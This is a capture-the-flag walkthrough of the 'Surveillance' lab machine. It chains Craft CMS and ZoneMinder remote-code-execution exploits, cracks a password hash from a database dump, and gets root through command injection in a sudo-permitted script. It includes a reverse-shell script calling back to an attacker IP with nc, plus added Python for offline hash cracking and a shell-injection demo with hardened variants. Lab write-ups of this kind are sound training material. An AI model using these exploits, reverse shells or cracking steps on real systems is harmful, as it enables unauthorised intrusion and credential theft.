Surveillance

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_  256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://surveillance.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The web server redirects to surveillance.htb, so add the name to /etc/hosts before browsing:
echo "10.129.230.42 surveillance.htb" >> /etc/hosts
 
 
The site identifies itself as Craft CMS 4.4.14.
 
Searching for RCE vulnerabilities affecting that version turns up CVE-2023-41892, an unauthenticated remote code execution bug in Craft CMS 4.0.0-RC1 through 4.4.14 (fixed in 4.4.15). Running a public PoC against http://surveillance.htb/ returns a shell as www-data.
Upgrade the shell so it is fully interactive:
script /dev/null -c /bin/bash
(press Ctrl+Z)
stty raw -echo; fg
(press Enter twice)
export TERM=xterm
 
Enumerating the web root turns up a database backup in Craft's storage directory:
www-data@surveillance:~/html/craft/storage/backups$ ls
surveillance--2023-10-17-202801--v4.4.14.sql  surveillance--2023-10-17-202801--v4.4.14.sql.zip
www-data@surveillance:~/html/craft/storage/backups$ file surveillance--2023-10-17-202801--v4.4.14.sql
surveillance--2023-10-17-202801--v4.4.14.sql: ASCII text
 
The .sql dump is downloaded for offline inspection. A keyword search finds the users table; tracing back to its INSERT statement (search for "INSERT INTO `users`") gives:
INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
UNLOCK TABLES;
commit;
The value 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec is a password hash: 64 hex characters, the shape of an unsalted SHA-256 digest rather than the bcrypt ($2y$...) string Craft CMS normally stores, which makes it a good candidate for dictionary cracking.
/etc/passwd on the box lists a local user named "matthew", matching the "Matthew B" full name on the admin account.
An online hash-lookup service cracks the hash from the .sql file to starcraft122490. Trying it against the local account:
ssh matthew@surveillance.htb
(enter starcraft122490 at the password prompt)
The login succeeds: we now have a shell as matthew.
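The dump-to-credential step above can be done offline instead of pasting hashes into a web cracker. The following is an added example (not code from the writeup): it pulls the users rows out of a mysqldump, locates the hash by shape rather than by column position, flags that it is SHA-256-shaped instead of Craft's usual bcrypt, and runs a dictionary attack. The only real data is the single users row from the page; the surrounding dump framing and the tiny WORDLIST are constructed stand-ins for the backup file and rockyou.txt.

```python
import hashlib
import re

# Constructed sample: the `users` row from the backup dump shown above, wrapped
# the way mysqldump emits it. Only this one row is real; the framing is ours.
SAMPLE_DUMP = """\
LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
UNLOCK TABLES;
"""

# Hypothetical mini wordlist standing in for rockyou.txt; the last entry is the
# password the page reports recovering with an online cracker.
WORDLIST = ["password", "admin", "surveillance", "zoneminder", "starcraft122490"]

HEX64 = re.compile(r"^[0-9a-f]{64}$")
# One VALUES token: a single-quoted string (with '' or \x escapes) or a bare token.
_TOKEN = re.compile(r"'((?:[^'\\]|\\.|'')*)'|([^,'\s][^,]*)")


def split_sql_values(tuple_text):
    """Split the inside of one VALUES (...) tuple: NULL -> None, bare integers
    -> int, quoted strings -> str (undoing the '' and \\x escapes mysqldump uses)."""
    out = []
    for quoted, bare in _TOKEN.findall(tuple_text):
        if bare:
            bare = bare.strip()
            out.append(None if bare.upper() == "NULL" else
                       int(bare) if bare.lstrip("-").isdigit() else bare)
        else:
            out.append(re.sub(r"\\(.)|''", lambda m: m.group(1) or "'", quoted))
    return out


def iter_value_tuples(dump, table):
    """Yield the text inside each (...) tuple of the INSERT INTO ... VALUES
    statements for `table`, tracking quotes so parentheses inside strings are ignored."""
    for m in re.finditer(r"INSERT INTO `%s` VALUES\s*" % re.escape(table), dump):
        i, depth, in_str, start = m.end(), 0, False, 0
        while i < len(dump) and not (dump[i] == ";" and not in_str):
            c = dump[i]
            if in_str:
                if c == "\\":
                    i += 1                  # skip the escaped character
                elif c == "'":
                    in_str = False
            elif c == "'":
                in_str = True
            elif c == "(":
                depth += 1
                if depth == 1:
                    start = i + 1
            elif c == ")":
                depth -= 1
                if depth == 0:
                    yield dump[start:i]
            i += 1


def extract_user_hashes(dump):
    """Return (username, email, hash) per row of the users table. Fields are
    located by shape, not column index, so schema differences do not matter."""
    rows = []
    for tup in iter_value_tuples(dump, "users"):
        strs = [v for v in split_sql_values(tup) if isinstance(v, str)]
        username = strs[0] if strs else None
        email = next((s for s in strs if "@" in s), None)
        pw = next((s for s in strs if HEX64.match(s) or s.startswith("$2")), None)
        rows.append((username, email, pw))
    return rows


def classify_hash(h):
    """Rough hash-shape identification; Craft CMS itself stores bcrypt."""
    if h is None:
        return "none"
    if h.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt (Craft CMS default)"
    if HEX64.match(h):
        return "64 hex chars: unsalted SHA-256 shaped"
    return "unknown"


def sha256_hex(word):
    return hashlib.sha256(word.encode()).hexdigest()


def crack_sha256(target, words):
    """Offline dictionary attack against one unsalted SHA-256 hex digest."""
    target = target.lower()
    return next((w for w in words if sha256_hex(w) == target), None)


if __name__ == "__main__":
    for user, email, h in extract_user_hashes(SAMPLE_DUMP):
        print(user, email, h, classify_hash(h))
        if h and HEX64.match(h):
            print("cracked:", crack_sha256(h, WORDLIST))
```

Locating the hash by shape matters because Craft's users table has changed layout across versions; a fixed column index would silently pick the wrong field. If classify_hash reports bcrypt instead, a plain SHA-256 wordlist loop is the wrong tool and the hash should go to hashcat mode 3200 with a realistic time budget.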
SUID binaries and sudo -l: nothing usable for matthew.
Local listening ports were checked next; MySQL is bound locally, but no password for it is known at this point.
Check the OS release:
matthew@surveillance:~$ cat /etc/os-release
PRETTY_NAME="Ubuntu 22.04.3 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy
Ubuntu 22.04 kernels were affected by GameOver(lay) (CVE-2023-2640 / CVE-2023-32629, an OverlayFS privilege escalation), so that is the first thing to try. g1vi's public PoC on GitHub (CVE-2023-2640-CVE-2023-32629) was run here, but it does not work on this host.
linpeas next. Among its findings, the ZoneMinder API configuration contains database credentials:
╔══════════╣ Analyzing Backup Manager Files (limit 70)
-rw-r--r-- 1 root zoneminder 5265 Nov 18 2022 /usr/share/zoneminder/www/ajax/modals/storage.php
-rw-r--r-- 1 root zoneminder 1249 Nov 18 2022 /usr/share/zoneminder/www/includes/actions/storage.php
-rw-r--r-- 1 root zoneminder 3503 Oct 17 11:32 /usr/share/zoneminder/www/api/app/Config/database.php
'password' => ZM_DB_PASS,
'database' => ZM_DB_NAME,
'host' => 'localhost',
'password' => 'ZoneMinderPassword2023',
'database' => 'zm',
$this->default['host'] = $array[0];
$this->default['host'] = ZM_DB_HOST;
-rw-r--r-- 1 root zoneminder 11257 Nov 18 2022 /usr/share/zoneminder/www/includes/database.php
This yields the MySQL password for the zm database: ZoneMinderPassword2023.
ZoneMinder is an open-source CCTV / video surveillance application (the box name is a hint). Its web interface normally listens on port 80, but nginx already serves Craft CMS there, so the 8080 listener seen among the local ports is the likely ZoneMinder instance.
Forward it over SSH and browse to http://localhost:1234:
ssh -L 1234:localhost:8080 matthew@surveillance.htb
(enter starcraft122490 at the password prompt)
The ZoneMinder login page appears. Both admin:ZoneMinderPassword2023 and admin:admin fail.
Check the ZoneMinder version from its config files:
cd /usr/share/zoneminder/www/api/app/Config; cat * | grep -i version
The version is 1.36.32.1.
Searching for that version leads to CVE-2023-26035, a missing authorization check in ZoneMinder's snapshot action that allows unauthenticated remote code execution (fixed in 1.36.33). A public exploit:
git clone https://github.com/rvizx/CVE-2023-26035
Running it against the forwarded port returns a shell in the ZoneMinder web context.
 
From that shell, /usr/bin/zmupdate.pl can be run as root through sudo. The script passes its --user value into a shell command string, so a $(...) command substitution placed in that argument executes as root.
Create a reverse-shell script (the page calls it a bind shell, but nc connects back out to the attacker), /tmp/pwn.sh, and make it executable; the attacking host listens with nc -lvnp 8888:
#!/bin/bash
nc 10.10.16.12 8888 -e sh
sudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/pwn.sh)' --pass=ZoneMinderPassword2023
No callback arrives: the nc shipped with Ubuntu is netcat-openbsd, which has no -e option. busybox's nc does support it, so change pwn.sh to use that:
#!/bin/bash
busybox nc 10.10.16.12 8888 -e sh
Rerun the zmupdate.pl command and the listener receives a root shell.
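Why the --user trick works, as an added example that is neither the writeup's nor ZoneMinder's code: a program that concatenates a caller-controlled value into a command string and hands it to sh lets a $(...) inside that value run before the real command ever sees it, whereas passing separate argv elements or shlex-quoting keeps it literal. printf stands in for mysqldump so each argument the inner command received is echoed back; PAYLOAD is a constructed marker rather than a reverse shell.

```python
import shlex
import subprocess

# Constructed payload: the same command-substitution trick the page puts in
# --user for zmupdate.pl, but running a harmless marker instead of a shell.
PAYLOAD = "$(echo INJECTED)"


def _lines(stdout):
    """Split printf output into the argument list the inner command received."""
    return stdout.split("\n")[:-1]


def unsafe_build(user):
    """Mimic a script that glues a caller-controlled value into a command
    string and hands it to the shell (the pattern exploited above). sh
    evaluates the $(...) inside `user` before printf/mysqldump runs."""
    cmd = "printf '%s\\n' mysqldump -u" + user + " -pSECRET"
    return _lines(subprocess.run(["sh", "-c", cmd], capture_output=True,
                                 text=True, check=True).stdout)


def safe_build(user):
    """Hardened form: each argument is its own argv element, so no shell ever
    parses `user` and the $(...) stays literal."""
    argv = ["printf", "%s\n", "mysqldump", "-u" + user, "-pSECRET"]
    return _lines(subprocess.run(argv, capture_output=True, text=True,
                                 check=True).stdout)


def quoted_build(user):
    """If a shell string is unavoidable, shlex.quote every interpolated value;
    the substitution is then passed through as plain text."""
    cmd = "printf '%s\\n' mysqldump " + shlex.quote("-u" + user) + " -pSECRET"
    return _lines(subprocess.run(["sh", "-c", cmd], capture_output=True,
                                 text=True, check=True).stdout)


if __name__ == "__main__":
    print("unsafe :", unsafe_build(PAYLOAD))
    print("argv   :", safe_build(PAYLOAD))
    print("quoted :", quoted_build(PAYLOAD))
```

The sudo rule is what turns this from a bug into root: any argument a sudo-permitted script forwards to a shell is an attacker-controlled command line, so such rules should be reviewed with the script's source open, not just its name.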